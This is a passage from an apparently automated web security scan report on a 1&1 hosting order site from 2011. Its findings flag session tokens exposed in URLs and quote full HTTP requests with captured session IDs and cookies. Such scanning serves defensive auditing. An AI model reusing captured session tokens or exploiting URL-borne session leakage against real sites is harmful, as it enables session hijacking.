<li class="dropdown left first_item"><a class="core_button_normal" href="/xml/order/Home;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServer&amp;linkId=hd.nav.home" rel="button-hd-nav-home">Home</a></li><li class="dropdown left"><a class="core_button_normal" href="/xml/order/Instant;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServer&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Domains</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Instant;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServer&amp;linkId=hd.nav.domainSearch" rel="button-hd-nav-domainSearch">Domain Search</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/DomaininfoMove;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServer&amp;linkId=hd.nav.domainTransfer" rel="button-hd-nav-domainTransfer">Domain Transfer</a>
...[SNIP]...
<li class="dropdown left"><a class="core_button_normal" href="/xml/order/Mail;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServer&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailInstantMail;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServer&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Instant Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailXchange;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServer&amp;linkId=hd.nav.ecommerce" rel="button-hd-nav-ecommerce">1&amp;1 MailXchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MicrosoftExchange;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServer&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Microsoft&reg; Exchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Hosting;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServer&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Linux Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MsHosting;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServer&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Microsoft Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkId=ngh&amp;site=PU.NGH.US&amp;origin.page=VirtualServer&amp;page=switch&amp;linkOrigin=VirtualServer&amp;linkId=ngh" rel="redirectlink-ngh">
MyBusiness Site
</a>
...[SNIP]...
<li class="dropdown left"><a class="core_button_normal" href="/xml/order/Eshops;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServer&amp;linkId=hd.nav.ecommerce" rel="button-hd-nav-ecommerce">eCommerce</a></li><li class="dropdown left"><a class="core_button_normal" href="/xml/order/Server;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServer&amp;linkId=hd.nav.server" rel="button-hd-nav-server">Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/ServerPremium;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServer&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">1&amp;1 Dedicated Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/CloudDynamicServer;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServer&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">
1&amp;1 Dynamic Cloud Server
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/VirtualServer;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServer&amp;linkId=hd.nav.mail">1&amp;1 Virtual Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/LocalSubmission;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServer&amp;linkId=hd.nav.listlocal" rel="button-hd-nav-listlocal">ListLocal</a></li><li><a class="core_button_normal" href="/xml/order/Sharepoint;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServer&amp;linkId=hd.nav.sharepoint" rel="button-hd-nav-sharepoint">Microsoft&reg; Sharepoint&reg;</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/CloudDynamicServer;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServer&amp;linkId=hd.tab.cds" rel="button-hd-tab-cds"><span>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/ServerPremium;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServer&amp;linkId=hd.tab.serverpremium" rel="button-hd-tab-serverpremium"><span>
...[SNIP]...
</p><a class="core_button_normal" onclick="return !window.open(this.href,'_blank','toolbar=no,location=no,status=yes,menubar=no,scrollbars=yes,resizable=yes,width=665,height=480,screenX=100,screenY=100');" href="/xml/order/FeatureServerMonitoring;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff"><strong>
...[SNIP]...
<div class="buttonForward"><a class="btn btn-blue-medium" href="/xml/order/CloudDynamicServer;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;ordernow=true"><span>
...[SNIP]...
<div class="buttonForward"><a class="btn btn-blue-medium" href="/xml/order/VirtualServerL;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;ordernow=true"><span>
...[SNIP]...
<div class="buttonForward"><a class="btn btn-blue-medium" href="/xml/order/VirtualServerXL;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;ordernow=true"><span>
...[SNIP]...
<div class="buttonForward"><a class="btn btn-blue-medium" href="/xml/order/VirtualServerXXL;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;ordernow=true"><span>
...[SNIP]...
</ul><a rel="height=480, width=665" class="btn btn-detail-lightblue window-open" href="/xml/order/popupServerOsVps;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">
Details
</a>
...[SNIP]...
</p><a rel="height=590, width=665" class="window-open" href="/xml/order/popupGreenPower;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">More...</a>
...[SNIP]...
</p><a rel="height=480, width=643" class="window-open" href="/xml/order/popupPayPalInfo;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">More...</a>
...[SNIP]...
<br><a class="core_button_normal" href="/xml/order/TcSpecialOffers;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">Click here</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/AboutUs;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServer&amp;linkId=hd.nav.about" rel="button-hd-nav-about">
About 1&amp;1
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkId=ft.nav.pressroom&amp;site=ST.PRE.US&amp;origin.page=VirtualServer&amp;linkOrigin=VirtualServer&amp;linkId=ft.nav.pressroom" rel="redirectlink-ft-nav-pressroom">
Press Room
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Gtc;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServer&amp;linkId=ft.nav.tandc" rel="button-ft-nav-tandc">
T&amp;C
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/PrivacyPolicy;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServer&amp;linkId=ft.nav.privacypolicy" rel="button-ft-nav-privacypolicy">
Privacy Policy
</a>
...[SNIP]...
<li><a rel="height=512, width=683" class="window-open" href="/xml/order/TellAFriend;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServer&amp;linkId=ft.nav.tellafriend&amp;linkType=txt">
Tell a friend
</a>
...[SNIP]...

3.98. http://order.1and1.com/xml/order/VirtualServer  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/VirtualServer

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/VirtualServer;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff&linkOrigin=CloudDynamicServer&linkId=hd.tab.vps HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/CloudDynamicServer;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Static&linkOrigin=MsHosting&linkId=hd.nav.domains
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=Hosting; ucuo=20110320183236-002.TCpfix141a; lastpage=CloudDynamicServer; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=6185bdfc6163d400; UT=YZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:30:AAABLtRnZNPcSJFdN9f55FNyE*t5Qv64:1300643669203; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:54:16 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=yZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; Expires=Fri, 07-Apr-2079 21:08:23 GMT; Path=/
ETag: dd3a6908188586141eb93efcd06408c1
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 25297


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

3.99. http://order.1and1.com/xml/order/VirtualServerL  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/VirtualServerL

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /xml/order/VirtualServerL;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff&ordernow=true HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/VirtualServer;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff&linkOrigin=CloudDynamicServer&linkId=hd.tab.vps
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=CloudDynamicServer; ucuo=20110320185042-000.TCpfix141a; lastpage=VirtualServer; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=6185bdfc6163d400; UT=hdWo6PT40XV1dV2pgZy1lXyweKGFUTj1UR0EpLSoqKScpJyQkJyYgIycaHBsaLlNBbWJkciosJ1cwWmkvIiMfHiMfHSA1LzcuLTZubzUqMWFqMCMkIB8kIR8fHjMxMzY=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:31:AAABLtRnmq4LJJFFFit1Kk3sM2vCTUk2:1300643682990; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:54:24 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=aZVoqLS4kZGRkXnFnbjRsZjMlL2hbVS1ENzEZHRoxMC4wLisrLi0nKi4hIyIhHkMxXVJUYjEzLl43YXA2KSomJSomJCclHyceHSZedjwxOGhxNyorJyYrKCYmJSMhIyY=; Expires=Fri, 07-Apr-2079 21:08:31 GMT; Path=/
ETag: 8445c1f0969d65ef75b448c84b35d290
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 48662


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
<div id="header"><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkId=hd.log.eue&amp;site=PU.WH.US&amp;origin.page=VirtualServerL&amp;linkOrigin=VirtualServerL&amp;linkId=hd.log.eue" rel="redirectlink-hd-log-eue"><img alt="1&amp;1 Internet AG" id="header_logo" src="/modules/frontend-skin-odin/img/frontend-skin-odin/header/logo_1and1.png" class="alphapng">
...[SNIP]...
<li class="dropdown left first_item"><a class="core_button_normal" href="/xml/order/Home;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServerL&amp;linkId=hd.nav.home" rel="button-hd-nav-home">Home</a></li><li class="dropdown left"><a class="core_button_normal" href="/xml/order/Instant;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServerL&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Domains</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Instant;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServerL&amp;linkId=hd.nav.domainSearch" rel="button-hd-nav-domainSearch">Domain Search</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/DomaininfoMove;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServerL&amp;linkId=hd.nav.domainTransfer" rel="button-hd-nav-domainTransfer">Domain Transfer</a>
...[SNIP]...
<li class="dropdown left"><a class="core_button_normal" href="/xml/order/Mail;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServerL&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailInstantMail;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServerL&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Instant Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailXchange;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServerL&amp;linkId=hd.nav.ecommerce" rel="button-hd-nav-ecommerce">1&amp;1 MailXchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MicrosoftExchange;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServerL&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Microsoft&reg; Exchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Hosting;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServerL&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Linux Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MsHosting;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServerL&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Microsoft Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkId=ngh&amp;site=PU.NGH.US&amp;origin.page=VirtualServerL&amp;page=switch&amp;linkOrigin=VirtualServerL&amp;linkId=ngh" rel="redirectlink-ngh">
MyBusiness Site
</a>
...[SNIP]...
<li class="dropdown left"><a class="core_button_normal" href="/xml/order/Eshops;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServerL&amp;linkId=hd.nav.ecommerce" rel="button-hd-nav-ecommerce">eCommerce</a></li><li class="dropdown left"><a class="core_button_normal" href="/xml/order/Server;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServerL&amp;linkId=hd.nav.server" rel="button-hd-nav-server">Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/ServerPremium;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServerL&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">1&amp;1 Dedicated Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/CloudDynamicServer;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServerL&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">
1&amp;1 Dynamic Cloud Server
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/VirtualServer;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServerL&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">1&amp;1 Virtual Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/LocalSubmission;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServerL&amp;linkId=hd.nav.listlocal" rel="button-hd-nav-listlocal">ListLocal</a></li><li><a class="core_button_normal" href="/xml/order/Sharepoint;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServerL&amp;linkId=hd.nav.sharepoint" rel="button-hd-nav-sharepoint">Microsoft&reg; Sharepoint&reg;</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/VirtualServer;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServerL&amp;linkId=hd.tab.packageselection" rel="button-hd-tab-packageselection"><span>
...[SNIP]...
</p><a class="core_button_normal" onclick="return !window.open(this.href,'_blank','toolbar=no,location=no,status=yes,menubar=no,scrollbars=yes,resizable=yes,width=665,height=480,screenX=100,screenY=100');" href="/xml/order/FeatureServerMonitoring;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff"><strong>
...[SNIP]...
<span class="osLinux"><a rel="height=480, width=665" class="btn btn-detail-darkblue btn-pos-detail window-open" href="/xml/order/FeatureServerVpsOsLinux;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">
Details
</a>
...[SNIP]...
<span class="osWindows"><a rel="height=480, width=665" class="btn btn-detail-darkblue btn-pos-detail window-open" href="/xml/order/FeatureServerVpsOsWindows;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">
Details
</a>
...[SNIP]...
<td class="link"><a class="core_button_normal" onclick="return !window.open(this.href,'_blank','toolbar=no,location=no,status=yes,menubar=no,scrollbars=yes,resizable=yes,width=665,height=480,screenX=100,screenY=100');" href="/xml/order/FeatureServerMonitoring;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureParallelsPlesk;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureServerProcessor;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureServerHarddrive;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureServerVpsOsLinux;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureServerVpsOsWindows;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureParallelsSB;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureParallelsPlesk;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureControlCenter;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureServerSsl;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureFtpBackup;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureDomainDomains;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureDomainDomains;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureDomainDomains;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureWebdesignIstock;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureCommunicationToolsMerchandise;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureFtpBackup;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
</p><a rel="height=590, width=665" class="window-open" href="/xml/order/popupGreenPower;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">More...</a>
...[SNIP]...
</p><a rel="height=480, width=643" class="window-open" href="/xml/order/popupPayPalInfo;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">More...</a>
...[SNIP]...
<br><a class="core_button_normal" href="/xml/order/TcSpecialOffers;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">Click here</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/AboutUs;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServerL&amp;linkId=hd.nav.about" rel="button-hd-nav-about">
About 1&amp;1
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkId=ft.nav.pressroom&amp;site=ST.PRE.US&amp;origin.page=VirtualServerL&amp;linkOrigin=VirtualServerL&amp;linkId=ft.nav.pressroom" rel="redirectlink-ft-nav-pressroom">
Press Room
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Gtc;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServerL&amp;linkId=ft.nav.tandc" rel="button-ft-nav-tandc">
T&amp;C
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/PrivacyPolicy;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServerL&amp;linkId=ft.nav.privacypolicy" rel="button-ft-nav-privacypolicy">
Privacy Policy
</a>
...[SNIP]...
